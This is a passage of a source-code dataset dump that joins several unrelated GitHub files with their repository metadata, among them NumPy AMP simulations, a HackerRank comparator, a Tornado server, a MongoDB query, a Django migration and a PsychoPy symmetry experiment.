np.trace(np.dot(self._m, F.T)) term2 += -1.0 / (2 * beta) * np.trace(np.dot(self._Q, sG)) term3 = 0 term3 += - self._energy1 determinant = np.linalg.det(covariance) m_term = - np.sum(self._m * np.dot(self._m, covariance / 2.0), axis = 1) term3 += - d * np.log(np.sqrt((2 * math.pi) ** k * determinant)) + np.sum(m_term) self._kl[self._iterations_taken] = term1 + term2 + term3 def iteration(self): """ This function does one iteration of Variational method. In other words, it goes from W_t to W_{t+1}""" beta = self._beta + 0.0 n = self._n + 0.0 d = self._d + 0.0 k = len(self._alpha) # updating H_t covariance = np.identity(k) + self._Q covariance = np.linalg.inv(covariance) F = np.sqrt(beta) * np.dot(self._m, covariance) self._H_hat = F / np.sqrt(beta) self._tm = np.dot(self._X, F) self._tQ = np.dot(F.T, F) / d + beta * covariance # deriving W_{t + 1} self._energy1 = 0 tF = np.zeros((self._n, k)) self._tG = np.zeros((k, k)) self._set_cache(self._tQ) for i in range(self._n): q, mu, omega = self._fs(A = self._tQ, b = self._tm[i, :], cache = True) tF[i, :] = np.sqrt(beta) * mu[:, 0] self._tG += omega * beta self._energy1 += q self._W_hat = tF / np.sqrt(beta) # Here Compute the KL self._compute_kl() self._m = np.dot(self._X.T, tF) self._Q = self._tG / d class AMP_Simulation(Simulation): """This class is a sub-class of Simulation and specializes it for AMP estimator. Extra Attributes: _JW = Jacobian with respect to W_t _JH = Jacobian with respect to H_t """ def __init__(self, n, d, beta, alpha, iteration_tol, integration_tol, eps): """Instantiates the simulation by setting the fundamental parameters of the problem.""" super(AMP_Simulation, self).__init__(n, d, beta, alpha, iteration_tol, integration_tol) k = len(alpha) # Extra estimated parameters self._Q = np.identity(k) self._tQ = np.identity(k) self._tG = np.zeros((k, k)) self._m = np.zeros((self._d, k)) self._tm = np.zeros((self._n, k)) self._kl = None self._energy1 = 0 self.compute_initial_conds(eps) def release_memory(self): super(AMP_Simulation, self).release_memory() del self._m del self._tm del self._tG @staticmethod def jacobian_W(omega, mu, q): temp = np.outer(mu, mu) return (omega - temp) def iteration(self): """ This function does one iteration of Variational method. In other words, it goes from W_t to W_{t+1}""" beta = self._beta + 0.0 n = self._n + 0.0 d = self._d + 0.0 k = len(self._alpha) # updating H_t covariance = np.identity(k) + self._Q covariance = np.linalg.inv(covariance) F = np.sqrt(beta) * np.dot(self._m, covariance) self._H_hat = F / np.sqrt(beta) B = np.sqrt(beta) * covariance self._tm = np.dot(self._X, F) - np.dot(self._W_hat, B) * np.sqrt(beta) self._tQ = np.dot(F.T, F) / d # deriving W_{t + 1} self._energy1 = 0 tF = np.zeros((self._n, k)) self._tG = np.zeros((k, k)) JW = np.zeros((k, k)) self._set_cache(self._tQ) for i in range(self._n): q, mu, omega = self._fs(A = self._tQ, b = self._tm[i, :], cache = True) tF[i, :] = np.sqrt(beta) * mu[:, 0] self._tG += omega * beta JW += AMP_Simulation.jacobian_W(omega, mu, q) self._energy1 += q self._W_hat = tF / np.sqrt(beta) C = JW / d * np.sqrt(beta) self._m = np.dot(self._X.T, tF) - np.dot(F, C) self._Q = np.dot(tF.T, tF) / d def compute_initial_conds(self, eps): """ This function computes the uninformative fixed point of the model when there is no signal. This fixed-point is perturbed and then used for initialization of the iterative algorithm. """ k = self._k + 0.0 k0 = self._k n = self._n + 0.0 d = self._d + 0.0 beta = self._beta #compute Q self._Q = np.ones((k0 , k0)) / (k ** 2) * (n / d) * beta covariance = np.identity(k0) + self._Q covariance = np.linalg.inv(covariance) #compute tOmega q, mu, tomg = self._fs(A = np.zeros((k0, k0)), b = np.zeros((k0, 1))) tomega = (tomg - np.dot(mu, mu.T)) * (n / d) temp = np.dot(covariance, tomega)[:, 0] LHS = beta * np.dot(np.ones((1, k0)), temp) RHS = np.sqrt(beta) * np.sum(self._X.T, axis = 1, keepdims = True) / k self._m = RHS / (LHS + 1) * np.ones((self._d, k0)) F = np.sqrt(beta) * np.dot(self._m, covariance) tF = np.ones((self._n, k0)) / k * np.sqrt(beta) self._tQ = np.dot(F.T, F) / d self._tm = np.dot(self._X, F) - np.sqrt(beta) * np.dot(tF, covariance) self._W_hat = tF / np.sqrt(beta) self._H_hat = F / np.sqrt(beta) perturbation = np.random.normal(size = (int(d), k0)) NP = np.linalg.norm(perturbation) NM = np.linalg.norm(self._m) self._m += perturbation / NP * eps * NM self._W_0 = np.copy(self._W_hat) self._H_0 = np.copy(self._H_hat) def _compute_energy(self): pass class Damped_AMP_Simulation(Simulation): """This class is a sub-class of Simulation and specializes it for (Damped) AMP estimator. Extra Attributes: _JW = Jacobian with respect to W_t _JH = Jacobian with respect to H_t _gamma = The damping parameter """ def __init__(self, n, d, beta, alpha, iteration_tol, integration_tol, gamma, eps): """Instantiates the simulation by setting the fundamental parameters of the problem.""" super(Damped_AMP_Simulation, self).__init__(n, d, beta, alpha, iteration_tol, integration_tol) k = len(alpha) # Extra estimated parameters self._KW = np.zeros((k, k)) self._KH = np.zeros((k, k)) self._m = np.zeros((d, k)) self._tm = np.zeros((n, k)) # The damping parameter. Chosen from (0, 1] self._gamma = gamma self._tQ = np.identity(k) self._Q = np.identity(k) self.compute_initial_conds(eps) def compute_initial_conds(self, eps): k = self._k + 0.0 k0 = self._k n = self._n + 0.0 d = self._d + 0.0 beta = self._beta #compute Q self._Q = np.ones((k0 , k0)) / (k ** 2) * (n / d) * beta covariance = np.identity(k0) + self._Q covariance = np.linalg.inv(covariance) #compute tOmega q, mu, tomg = self._fs(A = np.zeros((k0, k0)), b = np.zeros((k0, 1))) tomega = (tomg - np.dot(mu, mu.T)) * (n / d) temp = np.dot(covariance, tomega)[:, 0] LHS = beta * np.dot(np.ones((1, k0)), temp) RHS = np.sqrt(beta) * np.sum(self._X.T, axis = 1, keepdims = True) / k self._m = RHS / (LHS + 1) * np.ones((self._d, k0)) F = np.sqrt(beta) * np.dot(self._m, covariance) tF = np.ones((self._n, k0)) / k * np.sqrt(beta) self._tQ = np.dot(F.T, F) / d self._tm = np.dot(self._X, F) - np.sqrt(beta) * np.dot(tF, covariance) self._W_hat = tF / np.sqrt(beta) self._H_hat = F / np.sqrt(beta) perturbation = np.random.normal(size = (int(d), k0)) NP = np.linalg.norm(perturbation) NM = np.linalg.norm(self._m) self._m += perturbation / NP * eps * NM self._W_0 = np.copy(self._W_hat) self._H_0 = np.copy(self._H_hat) def iteration(self): """ This function does one iteration of AMP method. In other words, it goes from W_t to W_{t+1}""" beta = self._beta + 0.0 d = self._d + 0.0 n = self._n + 0.0 k = len(self._alpha) # Damping Parameter gamma = self._gamma + 0.0 # updating H covariance = np.identity(k) + self._Q covariance = np.linalg.inv(covariance) self._H_hat = np.dot(self._m, covariance) F = self._H_hat * np.sqrt(beta) JH = d * covariance self._KH = (1 - gamma) * self._KH + JH # Updating W_hat (weights) self._tm = gamma * np.dot(self._X, F) + (1 - gamma) * self._tm \ - (gamma ** 2) * (beta / d) * np.dot(self._W_hat, self._KH) self._tQ = np.dot(F.T, F) / d JW = np.zeros((k, k)) self._set_cache(self._tQ) for i in range(self._n): q, mu, omega = self._fs(self._tQ, self._tm[i, :], cache = True) self._W_hat[i, :] = mu[:, 0] JW += AMP_Simulation.jacobian_W(omega, mu, q) self._KW = (1 - gamma) * self._KW + JW self._m = gamma * np.sqrt(beta) * np.dot(self._X.T, self._W_hat) \ + (1 - gamma) * self._m - (beta / d) * (gamma ** 2) * np.dot(self._H_hat, self._KW.T) self._Q = (beta / d) * (np.dot(self._W_hat.T, self._W_hat)) def release_memory(self): super(Damped_AMP_Simulation, self).release_memory() del self._m del self._tm
[ "noreply@github.com" ]
bGhorbani.noreply@github.com
352fefeb4ea343b3c000635b5627547fd4fee3f3
c6d77ad20cf623e6eff01ece708f7e7b2752c040
/Sorting: Comparator.py
67ecb6eba3fea02e1ae622f5da9e1b62e64a3148
[]
no_license
pranshul2112/HackerRank
3d9ca2e2ed4a9ba145e4f8db6bee4a380eeadfc7
9bf635117363efd1e5c2f6bf65ca458b3686da78
refs/heads/master
2022-11-14T13:28:33.971112
2020-07-11T19:36:37
2020-07-11T19:36:37
262,601,669
1
1
null
null
null
null
UTF-8
Python
false
false
715
py
from functools import cmp_to_key class Player: def __init__(self, name, score): self.name = name self.score = score def __repr__(self): return "{} {}".format(self.name, self.score) def comparator(a, b): if a.name is b.name and a.score is b.score: return 0 elif a.score is b.score: return 1 if a.name > b.name else -1 return 1 if a.score < b.score else -1 n = int(input()) data = [] for i in range(n): name, score = input().split() score = int(score) player = Player(name, score) data.append(player) data = sorted(data, key=cmp_to_key(Player.comparator)) for i in data: print(i.name, i.score)
[ "noreply@github.com" ]
pranshul2112.noreply@github.com
d4ca37c80edf919e49093cbc0544a23e7676b04f
5654bd3d08a7ba33c8ded256a4b62ec3beaeb185
/python/NasaDataConverter/mark.py
fdcf81fb9ec92990e6517a25d468d432c221cc81
[]
no_license
wschodslonca/sdsz
57043dc2939cab5a894aa560fafec4f261f5de01
5ea6a3c508c4b2b24d13b3c19da7ba6b1274041e
refs/heads/master
2021-05-22T19:36:48.186761
2020-06-10T12:53:25
2020-06-10T12:53:25
253,047,283
0
1
null
null
null
null
UTF-8
Python
false
false
1,429
py
from areamarkers.areamarker import areamarker, list1d from markdrawers.drawer import * import os import time def main(): # pathfrom = '../resources/data/texts/2005/L3_ozone_omi_20051018.txt' # pathto = '../resources/data/test/to/test.png' # scraper = DataScraper(pathfrom) # new = mark(scraper) # convertToPng(pathto,scraper,None,new) year = int(input("type year to convert: ")) todir = f"../../src/resources/img/sim/{year}/" fromdir = f"resources/data/texts/{year}/" if os.path.exists(fromdir): if not os.path.exists(todir): try: os.mkdir(todir) except: print("unable to create dir") exit(-1) else: print(f"no data in year {year}") exit(-1) start = time.time() g = 1 for dirpath, dirnames, filenames in os.walk(fromdir): filenames.sort() for i in filenames: frompath = os.path.join(dirpath, i) print(frompath) try: scraper = DataScraper(frompath) topath = todir + scraper.date + '.png' temp = areamarker(scraper) new = list1d(temp) converttopng(topath, scraper, None, new) except: print("unable to convert") g += 1 end = time.time() print(end - start) if __name__ == '__main__': main()
[ "lenox139st@gmail.com" ]
lenox139st@gmail.com
3b383bca73c7c19fda1fe4eea52bb0918a5d55c5
16cb8cc18d92d4018f9ee3044565cf22d4daef70
/Lab0/Python/7_Loops.py
0e44f466e1bfeb11cff40ae4017307015a92b838
[]
no_license
zx-joe/Computational-Motor-Control-for-Salamandar-Robot
c13ac105d73b283ac86c00a00a7b25b28e3713af
c66d23fb8365e4b12263bb4115a30d708d42dbb2
refs/heads/master
2022-12-12T12:23:57.573980
2020-09-08T09:05:28
2020-09-08T09:05:28
256,481,679
1
0
null
null
null
null
UTF-8
Python
false
false
2,119
py
#!/usr/bin/env python3 """This script introduces you to the usage of Loops in Python. Loops are useful to repeatedly to do a task over and over again. Here we look at for and while loops in particular""" import farms_pylog as pylog # import farms_pylog for log messages ### FOR LOOPS AND WHILE LOOPS ### pylog.info(3*'\t' + 20*'#' + ' FOR AND WHILE LOOPS ' + 20*'#' + 3*'\n') # range returns a list of integers (Python 2) or a sequence (Python 3) # returns [0, 1, 2]: includes start value but excludes stop value pylog.info('Using range method between 0 and 3 {}'.format( list(range(0, 3)))) pylog.info('A very useful method for iteration') pylog.warning('Includes start value but excludes the stop values') list(range(3)) # equivalent: default start value is 0 list(range(0, 5, 2)) # returns [0, 2, 4]: third argument is the step value # Python 2 only: use xrange to create a sequence rather than a list (saves # memory) list(range(100, 100000, 5)) # for loop (not the recommended style) fruits = ['apple', 'banana', 'cherry'] pylog.warning('Not a Recommended style') for i in range(len(fruits)): pylog.info((fruits[i].upper())) # for loop (recommended style) pylog.warning('Recommended style') for fruit in fruits: pylog.info((fruit.upper())) # iterate through two things at once (using tuple unpacking) family = {'dad': 'homer', 'mom': 'marge', 'size': 6} pylog.info('Iterating over two things at once :') for key, value in list(family.items()): pylog.info((key, value)) # use enumerate if you need to access the index value within the loop pylog.info('Indexing the list') for index, fruit in enumerate(fruits): pylog.info((index, fruit)) # for/else loop for fruit in fruits: if fruit == 'banana': pylog.info('Found the banana!') break # exit the loop and skip the 'else' block else: # this block executes ONLY if the for loop completes without hitting # 'break' pylog.info("Can't find the banana") # while loop count = 0 while count < 5: pylog.info('This will print 5 times') count += 1 # equivalent to 'count = count + 1'
[ "xiao.zhou@epfl.ch" ]
xiao.zhou@epfl.ch
24fec9581990604235045666112daab4628ed59b
6b395bed7c9fe05b08e2b8fc87d63c3c11e7be3c
/AP Lab/Modules/2.py
9a726207c9ab3b7b189b7b94ff9dc6def34c6829
[]
no_license
rohith1125/sem-5-labs
46360686001abffbb9593d2e5f0977fad0467244
a402ccee801d39e1c070cd8fe16723769203974f
refs/heads/main
2023-02-07T11:51:25.593644
2021-01-04T06:04:59
2021-01-04T06:04:59
null
0
0
null
null
null
null
UTF-8
Python
false
false
141
py
import cmath n = complex(input()) print("SIN: ", cmath.sin(n)) # n in degrees print("SQRT: ", cmath.sqrt(n)) print("LOG: ", cmath.log(n))
[ "devangraj.arora@gmail.com" ]
devangraj.arora@gmail.com
9116ce7c08069c6b16143395c3f0886fb4b58e31
5c24336c033b5dd02f1022f9da3f0aee670c5b2f
/MATLAB Installed/BIDS_resources/P010_EX1/Code/SlidingOccluderStimMaker.py
073d795024f42e1ca9c0021dbe3923904fcef309
[ "CC0-1.0" ]
permissive
JohnTyCa/The-SPN-Catalogue
ab29e39ad42a1793f38448ac018dcf4918935013
75e729f867c275433b68807bc3f2228c57a3ccac
refs/heads/main
2023-08-30T06:31:35.726302
2022-05-16T14:17:39
2022-05-16T14:17:39
321,381,577
2
0
CC0-1.0
2022-05-16T14:17:40
2020-12-14T14:56:49
Python
UTF-8
Python
false
false
14,750
py
from numpy import * #many different maths functions from numpy.random import * #maths randomisation functions import os #handy system and path functions from psychopy import visual, core, data, event, sound, gui,parallel #these are the psychopy libraries import psychopy.logging #import like this so it doesn't interfere with numpy.log from pyglet.gl import * import math #import visualExtra import sys #import OpenGL.GL, OpenGL.GL.ARB.multitexture, OpenGL.GLU #from OpenGL import GLUT #parallel.setPortAddress(0x378)#address for parallel port on many machines #parallel.setData(0) # w=[1,1,1] b=[-1,-1,-1] r= [1,0,0] dr=[0.,-1.,-1.] dgy= [-.5,-.5,-.5] lgy= [.5,.5,.5] # occludercolor= [.8,.8,.8] myWinColor= [-.3,-.3,-.3] # myWin = visual.Window(allowGUI=False, units='pix', allowStencil=True, color= myWinColor, size=(800,800),fullscr = False) #size=(800,600)) # , monitor = 'EEG lab participant')#creates a window using pixels as units myClock = core.Clock() expName='SlidingOccluder'#from the Builder filename that created this script expInfo={'N':00} dlg=gui.DlgFromDict(dictionary=expInfo,title=expName) if dlg.OK==False: core.quit() #user pressed cancel expInfo['date']=data.getDateStr()#add a simple timestamp expInfo['expName']=expName filenamexlsx= 'data/%s_%s' %(expInfo['N'], expInfo['date']) filenametxt= expName expInfo['date']=data.getDateStr()#add a simple timestamp expInfo['expName']=expName if not os.path.isdir('data'): os.makedirs('data')#if this fails (e.g. permissions) we will get error # #size=40 #ndots =20 #sizeE= 40 #maxheight= 200 #maxwidth= 140 # size=40 ndots =100 sizeE= 80 maxheight= 180 insideH= 180 maxwidth= 100 insideW= 60 height = 140 width = 90 nstepsy= 12 nstepsx= 3 jump= 10 # vertex = (((-maxwidth -(sizeE/2) ), (-maxheight)), ((maxwidth +(sizeE/2)), (-maxheight)),((maxwidth +(sizeE/2)), (maxheight)), ((-maxwidth-(sizeE/2)), (maxheight))) #e= visual.Rect(myWin, width=sizeE, height=sizeE, lineColor=None, fillColor=[-1,-1,-1]) e= visual.Circle(myWin,interpolate=True,radius = sizeE/5,lineColor=dgy, fillColor= dgy) basesquare= visual.ShapeStim(myWin, vertices = vertex, lineColor=b, fillColor=b, pos=(0,0)) fix=visual.TextStim(myWin, ori=0, text='+', pos=[0, 0], height=40, color=r, bold= True, colorSpace='rgb', units= 'pix',font='Times New Roman') #fix=visual.Circle(myWin, pos=[0, 0], radius=6, lineColor=None, fillColor=r, units= 'pix') responseScreen=visual.TextStim(myWin, ori=0,text = 'x', pos=[0,90], height=30, color=w, units= 'pix',font='Times New Roman') # # x= -maxwidth -(sizeE) y= maxheight +(sizeE) vertOccl= ((x,-y), (0,-y), (0,y), (x,y)) #vertOccl= (((-maxwidth -(sizeE)), (-maxheight -(sizeE))), (0, (-maxheight -(sizeE))),(0, (maxheight + (sizeE))), (((-maxwidth -(sizeE))), (maxheight+ (sizeE)))) #Occl= visual.ShapeStim(myWin, vertices = vertOccl, lineColor=[1,-1.,-1.], fillColor=[0.,-1.,-1.], pos=(0,0)) Occl= visual.ShapeStim(myWin, lineColor=None, fillColor=None, pos=(0,0))#[0.,-1.,-1.]# Occl.setVertices(vertOccl) #Occluder= visual.ImageStim(myWin, image ='occluder.png', size= (180,520)) # # PolyL=visual.ShapeStim(myWin, lineColor=None, fillColor=None) PolyR=visual.ShapeStim(myWin, lineColor=None, fillColor=None) stimL =visual.ShapeStim(myWin, lineColor=None, fillColor=lgy) stimR =visual.ShapeStim(myWin, lineColor=None, fillColor=lgy) # linea =visual.Rect(myWin, width=100, height=1.5, lineColor=(-1,-1,-1), fillColor=None) marginL =visual.Line(myWin) marginR =visual.Line(myWin) # # def message(Type, nBlocksToGo = 1): if Type == 'HelloPractice': message = ('Welcome to the Practice Experiment. You will see LOTS of patterns. Your task is to decide whether they are reflection or random') elif Type == 'HelloMain': message = ('Now for the real thing, its the same, but much longer. Try not to blink, and keep your eyes on the central fixation point') elif Type == 'Goodbye': message = ('Thank you for taking part in the Experiment') elif Type == 'Break': message = '%d Blocks to go: Wait for experimenter to check electrodes!' %nBlocksToGo Instructions=visual.TextStim(myWin, ori=0, text=message, pos=[0, 0], height=30, color='white', colorSpace='rgb', units= 'pix') Instructions.draw() myWin.flip() def fixation(): #basesquare.draw() fix.draw() # def preparepolygon(regularity, seedNo): seed(seedNo) coords =[] coords.append([0,-height]) # x= 0 # stepx= width/nstepsx # for i in range(nstepsx-1): # x= x-stepx # y= -height + randint(-20,20) # coords.append([x,y]) coords.append([-width, -height]) y = -height stepy = (height*2)/nstepsy for i in range(nstepsy-1): y = y +stepy x = -width + randint(-40,40) coords.append([x,y]) coords.append([-width, height]) # x= -width # for i in range(nstepsx-1): # x= x+stepx # y= height + randint(-20,20) # coords.append([x,y]) coords.append([0, height ]) coords.append([0, -height]) PolyL.setVertices(coords) if regularity=='ref': temp = [] for i in range(len(coords)): temp.append([-coords[i][0],coords[i][1]]) PolyR.setVertices(temp) if regularity == 'ran': # the left side coords =[] coords.append([0,-height]) # x= 0 # stepx= width/nstepsx # for i in range(nstepsx-1): # x= x+stepx # y= -height + randint(-20,20) # coords.append([x,y]) coords.append([width, -height]) y = -height stepy = (height*2)/nstepsy for i in range(nstepsy-1): y = y +stepy x = width + randint(-40,40) coords.append([x,y]) coords.append([width, height]) # x= width # for i in range(nstepsx-1): # x= x-stepx # y= height + randint(-20,20) # coords.append([x,y]) coords.append([ 0, height ]) coords.append([0, -height]) PolyR.setVertices(coords) # PolyL.draw() # PolyR.draw() def colorpolygon(): left = PolyL.vertices right = PolyR.vertices flag = 0 for i in range(nstepsy): s1= [] s2= [] s1.append(left[i+1]) s1.append(left[i+2]) s1.append([0,left[i+2][1]]) s1.append([0,left[i+1][1]]) s2.append(right[i+1]) s2.append(right[i+2]) s2.append([0,right[i+2][1]]) s2.append([0,right[i+1][1]]) stimL.vertices= s1 stimR.vertices= s2 stimL.size= stimR.size= 1.3 stimL.draw() stimR.draw() def insidepolygon(regularity, seedNo): seed(seedNo) ecoord = [] erad=[] ecolor=[] a=[0] b=[1] memory =(a*(400-ndots))+(b*ndots) shuffle(memory) # PolyL.enabled=True i= 0 for x in range (-insideW,0,jump): for y in range(-insideH, insideH, jump): if PolyL.contains(x,y): if (memory[i]== 1): rad=randint(4,12) ecoord.append([x,y]) erad.append([rad]) e.setPos([x,y]) e.setRadius([rad]) e.draw() i= i+1 # if regularity == 'ref': i = 0 for i in range (len(ecoord)): e.setPos([-ecoord[i][0],ecoord[i][1]]) e.setRadius(erad[i]) e.draw() i= i+1 elif regularity == 'ran': shuffle(memory) i= 0 for x in range (insideW,0,-jump): for y in range(-insideH, insideH, jump): if PolyR.contains(x,y): if (memory[i]== 1): rad=randint(4,12) e.setPos([x,y]) e.setRadius([rad]) e.draw() i= i+1 def shapescreenshot(regularity, seedNo): global screenshot preparepolygon(regularity, seedNo) colorpolygon() insidepolygon(regularity, seedNo) #screenshot = visual.BufferImageStim(myWin, rect=(-.5, .5, .5, -.5)) screenshot = visual.BufferImageStim(myWin, rect=(-.6, .6, .6, -.6)) # def drawOccluder(shiftPos, OcclStartPos): yPos= 0 if OcclStartPos == 'left': xPos=0 Occl.setPos((xPos,yPos),"") if OcclStartPos == 'right': Occl.setPos((shiftPos,yPos),"") Occl.setFillColor(occludercolor) Occl.setLineColor(occludercolor) Occl.draw() fix.draw() def moveOccluder(shiftPos, speedOccl,regularity, seedNo, OcclStartPos, Pduration): OcclClock = core.Clock() yPos = 0 if OcclStartPos == 'left': xPos = 0 #OcclClock.reset(); t = 0 # ck = OcclClock.getTime() while xPos < shiftPos: xPos = xPos + speedOccl Occl.setPos((xPos,yPos),"") screenshot.draw() Occl.draw() fix.draw() myWin.flip() # ck= OcclClock.getTime() - ck # print ck elif OcclStartPos == 'right': xPos = shiftPos #OcclClock.reset(); t = 0 # ck = OcclClock.getTime() while xPos > 0: xPos = xPos - speedOccl Occl.setPos((xPos,yPos),"") screenshot.draw() Occl.draw() fix.draw() myWin.flip() # ck= OcclClock.getTime() - ck # print ck def responseCollect(regularity,ResponseScreenVersion): event.clearEvents() if ResponseScreenVersion == 1: responseScreen.setText('Reflection Random') responseScreen.draw() myWin.flip() responseKey = event.waitKeys(keyList=['a', 'l']) if responseKey == ['a']: choice = 'reg' if regularity== 'ran': respCorr = 0 elif regularity== 'ref': respCorr = 1 elif responseKey == ['l']: choice = 'ran' if regularity== 'ran': respCorr = 1 elif regularity== 'ref': respCorr = 0 elif ResponseScreenVersion == 2: responseScreen.setText('Random Reflection') responseScreen.draw() myWin.flip() responseKey = event.waitKeys(keyList=['a', 'l']) if responseKey == ['l']: choice = 'reg' if regularity== 'ran': respCorr = 0 elif regularity== 'ref': respCorr = 1 elif responseKey == ['a']: choice = 'ran' if regularity== 'ran': respCorr = 1 elif regularity== 'ref': respCorr = 0 return respCorr, choice def RunBlock(trialbook, Reps): #parallel.setData(0) myClock= core.Clock() trials=data.TrialHandler(nReps=Reps, method='sequential', trialList=data.importConditions(trialbook)) trialCounter = 0 fixduration = uniform(.2,.5) baselineduration= 1.5 FirstHalfduration=2#.5 SecondHalfduration = 2 shiftPos= 181 speedOccl= 181 nBlocksToGo = 8 blockDuration = 30 for thisTrial in trials: if thisTrial!=None: for paramName in thisTrial.keys(): exec('{} = thisTrial[paramName]'.format(paramName), locals(), globals()) #Python 3 string formatting if trialCounter == blockDuration: nBlocksToGo = nBlocksToGo - 1 message('Break',nBlocksToGo = nBlocksToGo) event.waitKeys(keyList=['g']) trialCounter = 0 #setOccluderType(OcclType) trialCounter= trialCounter+1 seedNo= trialCounter if event.getKeys(["escape"]): core.quit() event.clearEvents() myWin.close #regularity = 'ref' fixation() myWin.flip() t = myClock.getTime() + fixduration while myClock.getTime() < t: pass #do nothing fixation() drawOccluder(shiftPos, OcclStartPos) myWin.flip() shapescreenshot(regularity, seedNo) drawOccluder(shiftPos, OcclStartPos) t = myClock.getTime() + baselineduration while myClock.getTime() < t: pass #do nothing #PATTERN ONSET #parallel.setData(trigger) myWin.flip() myWin.getMovieFrame() n= "%s%s%s" %(regularity,OcclStartPos,'T1.png') myWin.saveMovieFrames(n) ## w= myClock.getTime() t = myClock.getTime() + FirstHalfduration while myClock.getTime() < t: pass #do nothing ## fh = myClock.getTime() - w ## print 'fh', fh moveOccluder(shiftPos, speedOccl,regularity, seedNo, OcclStartPos, SecondHalfduration) myWin.getMovieFrame() n= "%s%s%s" %(regularity,OcclStartPos,'T2.png') myWin.saveMovieFrames(n) ## sh = myClock.getTime() t = myClock.getTime() + SecondHalfduration while myClock.getTime() < t: pass #do nothing ## sh = myClock.getTime() - sh ## print 'sh', sh # PATTERN OFFSET ## wt= myClock.getTime() - w ## print 'whole thing', wt fixation() Occl.draw() fix.draw() myWin.flip() t = myClock.getTime() + fixduration while myClock.getTime() < t: pass #do nothing if event.getKeys(["escape"]): core.quit() event.clearEvents() myWin.close fixation() # RT = myClock.getTime() # respCorr, choice = responseCollect(regularity, ResponseScreenVersion) # RT= myClock.getTime() - RT # # # trials.addData('choice', choice) # trials.addData('respCorr', respCorr) # trials.addData('respTime',RT) # # # #save all data # trials.saveAsExcel(filenamexlsx+'.xlsx', sheetName= 'filenamexlsx', dataOut=['all_raw']) # trials.extraInfo =expInfo # trials.saveAsWideText('data/'+filenametxt+'.txt') trialbook='trialbook.xlsx' #message('HelloPractice') #event.waitKeys('Space') RunBlock(trialbook, 1) #message('HelloMain') #event.waitKeys('Space') #RunBlock(trialbook, 30) # (240 trials: 2 conditions (4subconditions): 120 reps) . #message('Goodbye') #event.waitKeys('Space')
[ "hljtyson@liverpool.ac.uk" ]
hljtyson@liverpool.ac.uk
0bcc0295445f46510f69acdc51a2bc69602ef712
d3853f741e9a5e0d6f6b7424e8307c6573863f89
/lesson4/find_cars.py
4714a6a94ac9fd7cf38d13187e91030dd1f57dc9
[]
no_license
nagilla-venkatesh/Data-Wrangling-with-MongoDB
6472451e800448af67edc769f76bf87a81e5c4ac
8548d2f6c3eeb5cd4f990ea07b1f88039c20e218
refs/heads/master
2022-11-05T20:29:13.731022
2018-10-15T08:27:11
2018-10-15T08:27:11
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,300
py
#!/usr/bin/env python """ Your task is to write a query that will return all cars manufactured by "Ford Motor Company" that are assembled in Germany, United Kingdom, or Japan. Please modify only 'in_query' function, as only that will be taken into account. Your code will be run against a MongoDB instance that we have provided. If you want to run this code locally on your machine, you have to install MongoDB, download and insert the dataset. For instructions related to MongoDB setup and datasets please see Course Materials. """ def in_query(): # Modify the below line with your query; try to use the $in operator. query = { "manufacturer" : "Ford Motor Company", "assembly" : { "$in" : ["Germany", "United Kingdom", "Japan"] } } return query # Do not edit code below this line in the online code editor. # Code here is for local use on your own computer. def get_db(): from pymongo import MongoClient client = MongoClient('localhost:27017') db = client.examples return db if __name__ == "__main__": db = get_db() query = in_query() autos = db.autos.find(query, {"name":1, "manufacturer":1, "assembly": 1, "_id":0}) print("Found autos:", autos.count()) import pprint for a in autos: pprint.pprint(a)
[ "venkatesh.nagilla@outlook.com" ]
venkatesh.nagilla@outlook.com
dc49a560cc917013648c6797e9aee34f69106e1b
63333e57527fb6880aef2577ec9f3acf9776d502
/main.py
152bedcdfc78e9aa4cb043b85d54ef20a209501a
[]
no_license
chaselee/tornado-linode
596daa9156c3818d0afbe1d2961f6bc1c795d5a9
c1159721d5d86513d14ba0e685d19d8f5d45cc1d
refs/heads/master
2021-01-10T21:07:27.616881
2013-03-16T04:56:43
2013-03-16T04:56:43
2,075,666
21
6
null
2014-02-13T04:58:45
2011-07-20T01:52:14
Python
UTF-8
Python
false
false
720
py
import tornado.ioloop from tornado.options import define, options, logging import tornado.web define("port", default=8888, help="run on the given port", type=int) settings = { "debug": True, } server_settings = { "xheaders" : True, } class MainHandler(tornado.web.RequestHandler): def get(self): self.write("Hello, Linode") def main(): tornado.options.parse_command_line() logging.info("Starting Tornado web server on http://localhost:%s" % options.port) application = tornado.web.Application([ (r"/", MainHandler), ], **settings) application.listen(options.port, **server_settings) tornado.ioloop.IOLoop.instance().start() if __name__ == "__main__": main()
[ "umchaselee@gmail.com" ]
umchaselee@gmail.com
e4afd99c50407f622a682d09e3830125874d47d2
335ce4b41ba842253e5421d6fdc407cddbc59e35
/FinalDataSetModel/migrations/0013_auto_20181122_1924.py
20ccd95a1256cb4a7caad23d2d8fbf50b2584374
[]
no_license
2018DataSet/ScratchDataset
898d61f6fe782adf0eba87ed62088a8ff59967a4
ebc7cc5be78476330782d6b2c4ee10a8dcf93d18
refs/heads/master
2020-04-07T23:51:48.593238
2018-12-06T09:03:03
2018-12-06T09:03:03
158,827,730
0
0
null
null
null
null
UTF-8
Python
false
false
724
py
# -*- coding: utf-8 -*- # Generated by Django 1.11.3 on 2018-11-22 11:24 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('FinalDataSetModel', '0012_auto_20181122_1921'), ] operations = [ migrations.RemoveField( model_name='knowmodel', name='author_id', ), migrations.AddField( model_name='knowmodel', name='author', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='FinalDataSetModel.TeacherModel', verbose_name='出课老师'), ), ]
[ "1583071538@qq.com" ]
1583071538@qq.com
c5b9bd010de9df17ce44d3ced4ccf69cf11a0deb
2071325c958baeccf009fd63803d459b809ec435
/tadh/index.py
d59a7b735c6e3205ca9be63cac5931a1f68b0441
[]
no_license
timtadh/codegolf
fd18eccaadf1a9d6c5c93026d28bee6914993268
434bc3fdc3881a993184ce54042b074b134ce440
refs/heads/master
2021-01-18T10:53:51.397524
2012-04-24T06:16:34
2012-04-24T06:16:34
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,510
py
